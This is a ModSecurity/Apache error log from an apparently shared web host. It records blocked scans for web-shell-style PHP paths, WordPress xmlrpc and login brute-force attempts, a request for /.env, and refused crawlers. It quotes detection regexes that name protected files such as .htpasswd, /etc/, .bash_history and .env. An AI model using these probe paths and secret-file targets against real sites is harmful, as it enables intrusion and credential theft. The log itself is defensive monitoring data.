[Tue May 26 16:17:18.600834 2026] [security2:error] [pid 782634:tid 782791] [client 20.192.3.167:9153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/ultra.php"] [unique_id "ahV6Nv_P9qBfeb1w76ZTnwAAABs"]
[Tue May 26 16:17:19.547733 2026] [security2:error] [pid 782634:tid 782773] [client 20.192.3.167:8018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/vv.php"] [unique_id "ahV6N__P9qBfeb1w76ZTswAAAAk"]
[Tue May 26 16:17:20.050473 2026] [security2:error] [pid 782634:tid 782884] [client 106.219.85.83:19834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6OP_P9qBfeb1w76ZTwQAAAHg"]
[Tue May 26 16:17:20.050577 2026] [security2:error] [pid 782634:tid 782884] [client 106.219.85.83:19834] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6OP_P9qBfeb1w76ZTwQAAAHg"]
[Tue May 26 16:17:20.415733 2026] [security2:error] [pid 782634:tid 782848] [client 20.192.3.167:7089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/V5.php"] [unique_id "ahV6OP_P9qBfeb1w76ZTzAAAAFQ"]
[Tue May 26 16:17:21.359615 2026] [security2:error] [pid 782634:tid 782844] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6OP_P9qBfeb1w76ZT3AAAAFA"]
[Tue May 26 16:17:21.405869 2026] [security2:error] [pid 782634:tid 782832] [client 20.192.3.167:7720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-user.php"] [unique_id "ahV6Of_P9qBfeb1w76ZT6gAAAEQ"]
[Tue May 26 16:17:21.999993 2026] [security2:error] [pid 782634:tid 782809] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Of_P9qBfeb1w76ZT-QAAAC0"]
[Tue May 26 16:17:22.381602 2026] [security2:error] [pid 782634:tid 782802] [client 20.192.3.167:5013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-blog.php"] [unique_id "ahV6Ov_P9qBfeb1w76ZUDgAAACY"]
[Tue May 26 16:17:23.343550 2026] [security2:error] [pid 782634:tid 782812] [client 20.192.3.167:3555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp.php"] [unique_id "ahV6O__P9qBfeb1w76ZUKQAAADA"]
[Tue May 26 16:17:23.555958 2026] [security2:error] [pid 782634:tid 782774] [client 185.191.171.3:28816] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/7/"] [unique_id "ahV6O__P9qBfeb1w76ZULgAAAAo"]
[Tue May 26 16:17:23.556122 2026] [security2:error] [pid 782634:tid 782774] [client 185.191.171.3:28816] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/7/"] [unique_id "ahV6O__P9qBfeb1w76ZULgAAAAo"]
[Tue May 26 16:17:24.364479 2026] [security2:error] [pid 782634:tid 782846] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6O__P9qBfeb1w76ZURgAAAFI"]
[Tue May 26 16:17:24.497437 2026] [security2:error] [pid 782634:tid 782816] [client 20.192.3.167:8375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/worksec.php"] [unique_id "ahV6PP_P9qBfeb1w76ZUUgAAADQ"]
[Tue May 26 16:17:25.064348 2026] [security2:error] [pid 782634:tid 782862] [client 107.189.18.44:63456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.18.189.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV6PP_P9qBfeb1w76ZUXwAAAGI"], referer: https://www.cagmedya.com/
[Tue May 26 16:17:25.064503 2026] [security2:error] [pid 782634:tid 782862] [client 107.189.18.44:63456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV6PP_P9qBfeb1w76ZUXwAAAGI"], referer: https://www.cagmedya.com/
[Tue May 26 16:17:25.401902 2026] [security2:error] [pid 782634:tid 782842] [client 20.206.111.238:14775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV6Pf_P9qBfeb1w76ZUaAAAAE4"]
[Tue May 26 16:17:25.402040 2026] [security2:error] [pid 782634:tid 782842] [client 20.206.111.238:14775] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV6Pf_P9qBfeb1w76ZUaAAAAE4"]
[Tue May 26 16:17:25.546201 2026] [security2:error] [pid 782634:tid 782828] [client 20.192.3.167:4484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-themes.php"] [unique_id "ahV6Pf_P9qBfeb1w76ZUbAAAAEA"]
[Tue May 26 16:17:26.408454 2026] [security2:error] [pid 782634:tid 782790] [client 20.192.3.167:4521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-signin.php"] [unique_id "ahV6Pv_P9qBfeb1w76ZUfwAAABo"]
[Tue May 26 16:17:27.008816 2026] [security2:error] [pid 782634:tid 782836] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Pv_P9qBfeb1w76ZUhgAAAEg"]
[Tue May 26 16:17:27.319935 2026] [security2:error] [pid 782634:tid 782834] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV6P__P9qBfeb1w76ZUmwAARn4"]
[Tue May 26 16:17:27.447990 2026] [security2:error] [pid 782634:tid 782778] [client 20.192.3.167:5045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-blog-header.php"] [unique_id "ahV6P__P9qBfeb1w76ZUnwAAAA4"]
[Tue May 26 16:17:27.536056 2026] [autoindex:error] [pid 782634:tid 782818] [client 198.235.24.122:63288] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:17:27.948588 2026] [security2:error] [pid 782634:tid 782873] [client 20.206.111.238:15175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/adminfuns.php"] [unique_id "ahV6P__P9qBfeb1w76ZUpwAAAG0"]
[Tue May 26 16:17:27.948727 2026] [security2:error] [pid 782634:tid 782873] [client 20.206.111.238:15175] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/adminfuns.php"] [unique_id "ahV6P__P9qBfeb1w76ZUpwAAAG0"]
[Tue May 26 16:17:28.460445 2026] [security2:error] [pid 782634:tid 782771] [client 196.189.121.19:1697] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6QP_P9qBfeb1w76ZUtgAAAAc"]
[Tue May 26 16:17:28.657505 2026] [security2:error] [pid 782634:tid 782885] [client 103.44.52.196:50406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6QP_P9qBfeb1w76ZUugAAAHk"]
[Tue May 26 16:17:28.657650 2026] [security2:error] [pid 782634:tid 782885] [client 103.44.52.196:50406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6QP_P9qBfeb1w76ZUugAAAHk"]
[Tue May 26 16:17:28.838714 2026] [security2:error] [pid 782634:tid 782806] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6QP_P9qBfeb1w76ZUuQAAACo"]
[Tue May 26 16:17:29.776136 2026] [security2:error] [pid 782634:tid 782879] [client 20.192.3.167:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahV6QP_P9qBfeb1w76ZUswAAAHM"]
[Tue May 26 16:17:29.803322 2026] [security2:error] [pid 782634:tid 782844] [client 20.206.111.238:15047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/sx_pms.php"] [unique_id "ahV6Qf_P9qBfeb1w76ZUywAAAFA"]
[Tue May 26 16:17:29.803410 2026] [security2:error] [pid 782634:tid 782844] [client 20.206.111.238:15047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/sx_pms.php"] [unique_id "ahV6Qf_P9qBfeb1w76ZUywAAAFA"]
[Tue May 26 16:17:30.283414 2026] [security2:error] [pid 782634:tid 782800] [client 20.192.3.167:7066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/ws.php"] [unique_id "ahV6Qv_P9qBfeb1w76ZU1QAAACQ"]
[Tue May 26 16:17:30.619204 2026] [security2:error] [pid 782634:tid 782882] [client 106.219.85.83:26877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Qv_P9qBfeb1w76ZU3wAAAHY"]
[Tue May 26 16:17:30.619569 2026] [security2:error] [pid 782634:tid 782882] [client 106.219.85.83:26877] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Qv_P9qBfeb1w76ZU3wAAAHY"]
[Tue May 26 16:17:30.698166 2026] [security2:error] [pid 782634:tid 782766] [client 176.65.139.231:38244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rbkgroups.co.in"] [uri "/.env"] [unique_id "ahV6Qv_P9qBfeb1w76ZU4wAAAAI"]
[Tue May 26 16:17:30.923590 2026] [security2:error] [pid 782634:tid 782794] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Qv_P9qBfeb1w76ZU2AAAAB4"]
[Tue May 26 16:17:31.222899 2026] [security2:error] [pid 782634:tid 782771] [client 20.192.3.167:4145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wsa.php"] [unique_id "ahV6Q__P9qBfeb1w76ZU7QAAAAc"]
[Tue May 26 16:17:31.341670 2026] [security2:error] [pid 782634:tid 782809] [client 20.206.111.238:14780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-info.php"] [unique_id "ahV6Q__P9qBfeb1w76ZU7gAAAC0"]
[Tue May 26 16:17:31.341783 2026] [security2:error] [pid 782634:tid 782809] [client 20.206.111.238:14780] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-info.php"] [unique_id "ahV6Q__P9qBfeb1w76ZU7gAAAC0"]
[Tue May 26 16:17:32.085790 2026] [security2:error] [pid 782634:tid 782839] [client 20.192.3.167:7717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/w.php"] [unique_id "ahV6RP_P9qBfeb1w76ZU_gAAAEs"]
[Tue May 26 16:17:32.448185 2026] [security2:error] [pid 782634:tid 782860] [client 112.86.225.177:49228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/"] [unique_id "ahV6RP_P9qBfeb1w76ZVAgAAAGA"]
[Tue May 26 16:17:32.448312 2026] [security2:error] [pid 782634:tid 782860] [client 112.86.225.177:49228] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "virgence.com"] [uri "/"] [unique_id "ahV6RP_P9qBfeb1w76ZVAgAAAGA"]
[Tue May 26 16:17:32.507201 2026] [security2:error] [pid 782634:tid 782876] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6RP_P9qBfeb1w76ZU_QAAAHA"]
[Tue May 26 16:17:33.083761 2026] [security2:error] [pid 782634:tid 782886] [client 20.192.3.167:10170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/x.php"] [unique_id "ahV6Rf_P9qBfeb1w76ZVEQAAAHo"]
[Tue May 26 16:17:34.106050 2026] [security2:error] [pid 782634:tid 782889] [client 20.192.3.167:12039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/xx.php"] [unique_id "ahV6Rv_P9qBfeb1w76ZVHgAAAH0"]
[Tue May 26 16:17:34.812416 2026] [security2:error] [pid 782634:tid 782861] [client 20.206.111.238:14464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-test.php"] [unique_id "ahV6Rv_P9qBfeb1w76ZVOQAAAGE"]
[Tue May 26 16:17:34.812512 2026] [security2:error] [pid 782634:tid 782861] [client 20.206.111.238:14464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/wp-test.php"] [unique_id "ahV6Rv_P9qBfeb1w76ZVOQAAAGE"]
[Tue May 26 16:17:35.107544 2026] [security2:error] [pid 782634:tid 782839] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Rv_P9qBfeb1w76ZVLwAAAEs"]
[Tue May 26 16:17:35.329237 2026] [security2:error] [pid 782634:tid 782836] [client 20.192.3.167:13714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahV6R__P9qBfeb1w76ZVQwAAAEg"]
[Tue May 26 16:17:36.207235 2026] [security2:error] [pid 782634:tid 782859] [client 20.192.3.167:2512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/y.php"] [unique_id "ahV6SP_P9qBfeb1w76ZVXgAAAF8"]
[Tue May 26 16:17:36.601587 2026] [security2:error] [pid 782634:tid 782855] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6SP_P9qBfeb1w76ZVXAAAAFs"]
[Tue May 26 16:17:36.958355 2026] [security2:error] [pid 782634:tid 782759] [remote 172.104.164.56:46414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV6SP_P9qBfeb1w76ZVbAAAXXw"]
[Tue May 26 16:17:37.701417 2026] [security2:error] [pid 782634:tid 782818] [client 102.38.9.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Sf_P9qBfeb1w76ZVeQAAADY"]
[Tue May 26 16:17:37.942503 2026] [autoindex:error] [pid 782634:tid 782869] [client 194.163.140.214:57661] AH01276: Cannot serve directory /home1/theaf49d/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 16:17:38.065977 2026] [security2:error] [pid 782634:tid 782874] [client 20.206.111.238:31209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/asd67.php"] [unique_id "ahV6Sv_P9qBfeb1w76ZVjgAAAG4"]
[Tue May 26 16:17:38.066087 2026] [security2:error] [pid 782634:tid 782874] [client 20.206.111.238:31209] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/asd67.php"] [unique_id "ahV6Sv_P9qBfeb1w76ZVjgAAAG4"]
[Tue May 26 16:17:38.993550 2026] [security2:error] [pid 782634:tid 782817] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Sv_P9qBfeb1w76ZVnQAAADU"]
[Tue May 26 16:17:39.291904 2026] [security2:error] [pid 782634:tid 782813] [client 103.44.52.196:56958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6S__P9qBfeb1w76ZVqQAAADE"]
[Tue May 26 16:17:39.292035 2026] [security2:error] [pid 782634:tid 782813] [client 103.44.52.196:56958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6S__P9qBfeb1w76ZVqQAAADE"]
